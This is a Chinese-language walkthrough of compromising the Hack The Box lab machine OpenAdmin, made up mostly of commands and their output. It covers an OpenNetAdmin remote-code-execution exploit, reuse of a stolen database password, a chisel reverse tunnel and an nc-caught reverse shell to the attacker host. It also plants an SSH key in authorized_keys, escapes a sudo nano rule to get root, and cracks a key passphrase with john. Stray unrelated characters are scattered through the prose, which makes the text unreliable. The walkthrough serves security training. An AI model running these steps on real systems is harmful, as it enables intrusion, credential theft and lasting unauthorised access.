免責(zé)聲明

本文滲透的主機(jī)經(jīng)過合法授權(quán)呻征。本文使用的工具和方法僅限學(xué)習(xí)交流使用，請(qǐng)不要將文中使用的工具和滲透思路用于任何非法用途罢浇，對(duì)此產(chǎn)生的一切后果陆赋，本人不承擔(dān)任何責(zé)任，也不對(duì)造成的任何誤用或損害負(fù)責(zé)嚷闭。

服務(wù)探測(cè)

查看開啟端口

┌──(root??kali)-[~/htb/OpenAdmin]
└─# nmap -p- 10.10.10.171 --open               
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-23 07:25 EST
Nmap scan report for 10.10.10.171
Host is up (0.44s latency).
Not shown: 52367 closed ports, 13166 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 190.21 seconds

查看指定端口詳細(xì)信息

(root??kali)-[~/htb/OpenAdmin]
└─# nmap -sV -T4 -sC -A -O 10.10.10.171 -p 22,80
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-23 07:29 EST
Nmap scan report for 10.10.10.171
Host is up (0.37s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (98%), Linux 3.2 (98%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (98%), Linux 3.16 (97%), ASUS RT-N56U WAP (Linux 3.4) (96%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%), Linux 2.6.16 (94%), Asus RT-AC66U router (Linux 2.6) (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   432.42 ms 10.10.14.1
2   440.73 ms 10.10.10.171

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.54 seconds

目錄爆破

┌──(root??kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.171 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.10.171/_21-12-23_07-30-54.txt

Error Log: /root/dirsearch/logs/errors-21-12-23_07-30-54.log

Target: http://10.10.10.171/

[07:31:03] Starting:   
[07:33:49] 200 -   11KB - /index.html                                       
[07:34:05] 301 -  312B  - /music  ->  http://10.10.10.171/music/             
[07:34:08] 301 -  310B  - /ona  ->  http://10.10.10.171/ona/                    

/ona/文件夾是一個(gè)叫openNetAdmin的cms攒岛，版本號(hào)是18.1.1

webshell

kali搜索這個(gè)cms的漏洞情況

┌──(root??kali)-[~/htb/OpenAdmin]
└─# searchsploit openNetAdmin 18.1.1
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                   |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                                                                                                                     | php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                                                                                                                                      | php/webapps/47691.sh
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

存在一個(gè)rce漏洞，但是自帶的這個(gè)exp不太好用

在github上找到了這個(gè)exp

拿到webshell

┌──(root??kali)-[~/htb/OpenAdmin]
└─# python3 ona-rce.py exploit http://10.10.10.171/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

提權(quán)

查看本目錄下config/config.inc.php文件胞锰，其中有兩行

// Include the localized Database settings
$dbconffile = "{$base}/local/config/database_settings.inc.php";

表示包含了一個(gè)數(shù)據(jù)庫(kù)連接文件

全局搜索這個(gè)文件

find / -name database_settings.inc.php 2>/dev/null

定位文件路徑為

/opt/ona/www/local/config/database_settings.inc.php

查看文件內(nèi)容

sh$ cat /opt/ona/www/local/config/database_settings.inc.php
<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

得到一個(gè)數(shù)據(jù)庫(kù)密碼：n1nj4W4rri0R!灾锯。從/etc/passwd可知有兩個(gè)bash用戶jimmy和joanna

提權(quán)到j(luò)immy

逐一嘗試ssh登錄，成功登陸到j(luò)immy

┌──(root??kali)-[~/htb/OpenAdmin]
└─# ssh jimmy@10.10.10.171        
The authenticity of host '10.10.10.171 (10.10.10.171)' can't be established.
RSA key fingerprint is SHA256:0RZ0tIo79V3XctDFJP5dC6s9XskBzxmyXLwOWgnOQEo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.171' (RSA) to the list of known hosts.
jimmy@10.10.10.171's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Dec 23 12:59:42 UTC 2021

  System load:  0.01              Processes:             175
  Usage of /:   30.9% of 7.81GB   Users logged in:       0
  Memory usage: 10%               IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

39 packages can be updated.
11 updates are security updates.


Last login: Thu Jan  2 20:50:03 2020 from 10.10.14.3
jimmy@openadmin:~$ 

沒有權(quán)限進(jìn)入joanna的文件夾嗅榕，相信user.txt在joanna的home目錄下

查看網(wǎng)絡(luò)連接

jimmy@openadmin:/tmp$ netstat -ano|grep LISTEN
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:52846         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp6       0      0 :::80                   :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)

留意有幾個(gè)網(wǎng)絡(luò)連接只監(jiān)聽了本地顺饮，3306是數(shù)據(jù)庫(kù)，53是dns凌那，這些都算正常兼雄。唯獨(dú)52846這個(gè)端口很陌生，因此非趁钡可疑赦肋。

隧道連接

把chisel傳到靶機(jī)

kali端：

./chisel server -p 8000 --reverse

靶機(jī)端：

./chisel client 10.10.14.3:8000 R:52846:localhost:52846

本地已經(jīng)可以監(jiān)聽到這個(gè)端口

┌──(root??kali)-[~/htb/OpenAdmin]
└─# netstat -nao|grep 52846                    
tcp6       0      0 :::52846                :::*                    LISTEN      off (0.00/0/0)

用nmap掃描一下這個(gè)端口的信息，發(fā)現(xiàn)是一個(gè)http服務(wù)

┌──(root??kali)-[~/htb/OpenAdmin]
└─# nmap -sV -T4 127.0.0.1 -p 52846        
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-23 08:48 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00021s latency).

PORT      STATE SERVICE VERSION
52846/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.19 seconds

打開http://localhost:52846/index.php是一個(gè)登陸頁面，我們不知道密碼和用戶名

回到靶機(jī)佃乘，查看apache的一個(gè)配置文件

jimmy@openadmin:~$ cat /etc/apache2/sites-enabled/internal.conf 
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

可以看到這個(gè)服務(wù)正是用戶joanna開啟

去到/var/www/internal

查看index.php,留意這幾行代碼囱井，可以看到用戶名是jimmy，密碼用sha512加密了

 if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
              if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
                  $_SESSION['username'] = 'jimmy';
                  header("Location: /main.php");
              } else {
                  $msg = 'Wrong username or password.';
              }
            }

把哈希密碼拿到啊這個(gè)網(wǎng)站解密趣避，得到：Revealed

現(xiàn)在用jimmy : Revealed登錄http://localhost:52846/index.php

拿到了joanna的ssh秘鑰

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----

底下還有一行字：

Don't forget your "ninja" password

使用上門的私鑰庞呕，ssh無法登錄，提示需要密碼鹅巍，用john無法爆破千扶，可能是一個(gè)兔子洞。骆捧。

此時(shí)留意到main.php是可編輯的澎羞，而且執(zhí)行了一個(gè)系統(tǒng)函數(shù)shell_exec

嘗試修改一行代碼

$output = shell_exec('id');

頁面成功打印:

uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)

這樣就非常簡(jiǎn)單，我們使用以下payload敛苇，拿到一個(gè)反彈shell

橫向提權(quán)到j(luò)oanna

這里我試了好多payload都不能反彈shell妆绞，最好只好在github上找到這個(gè)php的reverse-shell

拿到j(luò)oanna的shell

┌──(root??kali)-[~/htb/OpenAdmin]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.171] 41636
id
Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 15:37:07 up  3:14,  2 users,  load average: 0.01, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
jimmy    pts/1    10.10.14.3       14:37   14.00s  0.12s  0.12s -bash
jimmy    pts/2    10.10.14.3       13:34    1:50m  8.44s  8.38s ./chisel client 10.10.14.3:8000 R:52846:localhost:52846
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)
/bin/sh: 0: can't access tty; job control turned off
$ uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)
$ whoami
joanna

切換tty后，查看sudo特權(quán)枫攀，發(fā)現(xiàn)無法正常查看

joanna@openadmin:/$ sudo -l
sudo -l
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: error initializing audit plugin sudoers_audit

傳linpea到靶機(jī)發(fā)現(xiàn)有一個(gè)sudo特權(quán)的文件在/etc/sudoers.d/joanna

查看這個(gè)文件：

joanna@openadmin:/$ cat /etc/sudoers.d/joanna
cat /etc/sudoers.d/joanna
joanna ALL=(ALL) NOPASSWD:/bin/nano /opt/priv

日括饶。。来涨。

查了一下图焰，因?yàn)槲覀兪菑膚eb的反彈shell進(jìn)到系統(tǒng)的，在apache的這個(gè)文件里/etc/apache2/sites-enabled/internal.conf禁用了sudo

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

因此我們一直提示錯(cuò)誤蹦掐。

ssh

只好轉(zhuǎn)變思路技羔。

由于我們現(xiàn)在已經(jīng)是joanna的身份，可以編輯.ssh里的文件卧抗，把kali的id_rsa.public加入到j(luò)oanna的authorized_keys藤滥，就可以無密碼登錄joanna
這樣就可以跳過apache對(duì)sudo的限制

把id_rsa.public追加到authorized_keys

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXMYce9FPGn7FNt1MeNFTb2iTy917/1tzSKdRWnV4u2FmMUT85u92xUwpudizoAn10Bb7Y9r4813I3KjTzYO2OlJSCqQ4+PB+VI9/0dE67sInXsQJfdnXfguuA+oVzEU1QPCqCVuSt4pQaiXCeo0GmTiVZyVBNaJJoZCtNipqL/zyO5Avb6yfnxSYDusIPDuUWnJNBI9tE48MBDW0zDYdEajCddu2AjusHNNlS9nxgOqKulpsLM54/c2X5ttDp+DdYuQikc2Ju9MIDQE0og+W6QrtCF3FmKXMZxkU5OFTOmtfdg2U3OPoU1GKFOLks0tgglco9oDuO5qYHuD4/v7nRUtlTweCAOXDvGOItAB58uw2J8wINs6k/UrCL0or/tJ33vaoDFSI47WjRWNwEGNY+ESRjK1sbQFOdFGG2F4TvhWWv+mEEEKWtXlwBHYokIwRUzNy/s1cuMboUl6IqnorlCnLxazjx4/1VBm4Cu8j0cfa6VuzyiL+khSoz4RPG9Lc= root@kali" >> authorized_keys

ssh登錄到j(luò)oanna

┌──(root??kali)-[~]
└─# ssh joanna@10.10.10.171                                                                                                                                                                                    1 ?
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Dec 23 16:45:11 UTC 2021

  System load:  0.0               Processes:             204
  Usage of /:   31.1% of 7.81GB   Users logged in:       2
  Memory usage: 16%               IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

39 packages can be updated.
11 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Dec 23 16:34:27 2021 from 10.10.14.3
joanna@openadmin:~$ id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)

現(xiàn)在我們已經(jīng)是ssh登錄進(jìn)來，不受apache配置限制社裆，查看sudo特權(quán)

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

提權(quán)到root

執(zhí)行：

sudo /bin/nano /opt/priv

進(jìn)入nano編輯頁面以后依次執(zhí)行以下兩行命令：

^R^X
reset; sh 1>&0 2>&0

成功提權(quán)到root

Command to execute: reset; sh 1>&0 2>&0#                                                                                                                                                                           
#  Get Help                                                                                              ^X Read File
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# cat /root/root.txt
{不告訴你}

總結(jié)

總的來說還是簡(jiǎn)單的靶機(jī)拙绊，就是比較繞，有幾次提權(quán)泳秀，要保持耐心标沪。

補(bǔ)充

關(guān)于main.php里的這一句

Don't forget your "ninja" password

意思是ssh私鑰密碼里包含了ninja的字樣，可以用下面命令導(dǎo)出一個(gè)所有包含ninja的字典

grep -i ninja /usr/share/wordlists/rockyou.txt > rockyou_ninja

然后再根據(jù)這個(gè)字典爆破私鑰嗜傅，是可以爆破出來的谨娜。我之前用完整的rockyou.txt需要等很長(zhǎng)的時(shí)間，我通常覺得爆個(gè)10分鐘如果還不出來那大概這條路是不通的（僅僅針對(duì)這些靶機(jī)磺陡，真實(shí)環(huán)境不屬此列）。

┌──(root??kali)-[~/htb/OpenAdmin]
└─# /usr/share/john/ssh2john.py id_rsa >rsacrack
                                                                                                                                                                                                                                            
┌──(root??kali)-[~/htb/OpenAdmin]
└─# john --wordlist=./rockyou_ninja rsacrack 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (id_rsa)
1g 0:00:00:00 DONE (2021-12-23 21:13) 50.00g/s 88250p/s 88250c/s 88250C/s *69flyingninjamonkeys..#1FLUFFYCOCKYNINJA
Session completed

根據(jù)密碼，可以用openssl還原一個(gè)沒有密碼的私鑰證書

openssl rsa -in id_rsa -out id_rsa_openadmin_joanna

現(xiàn)在就可以用id_rsa_openadmin_joanna無密碼登陸joanna的賬號(hào)